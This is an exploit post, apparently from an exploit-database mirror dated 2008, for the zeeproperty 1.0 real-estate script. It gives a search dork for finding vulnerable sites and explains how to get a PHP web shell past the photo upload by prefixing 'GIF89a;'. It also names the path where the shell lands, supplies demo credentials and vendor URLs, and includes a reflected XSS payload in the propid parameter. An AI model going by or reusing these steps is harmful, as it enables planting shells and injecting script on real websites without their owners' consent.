[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities
# Published : 2008-11-08
# Author : ZoRLu
# Previous Title : MemHT Portal <= 4.0 Remote Code Execution Exploit
# Next Title : Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln
ZEEPROPERTY v1.0 remote file Upload & XSS
author: ZoRLu msn: trt-turk@hotmail.com
home: www.z0rlu.blogspot.com
dork: "Designed & Developed by Zeeways.com"
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
<?
...
...
...
?>
and save your_sheell.php
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
copy photo link and paste your explorer go your shell
your_shell:
localhost/script_path/companylogo/[id].php
example for demo:
user: zeeways
passwd: testing:
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
and your_shell link:
http://www.zeeproperty.com/companylogo/5622365.php
XSS for demo:
http://www.zeeproperty.com/view_prop_details.php?propid="><script>alert()</script>
thanks: str0ke & yildirimordulari.org & darkc0de.com
# www.Syue.com [2008-11-08]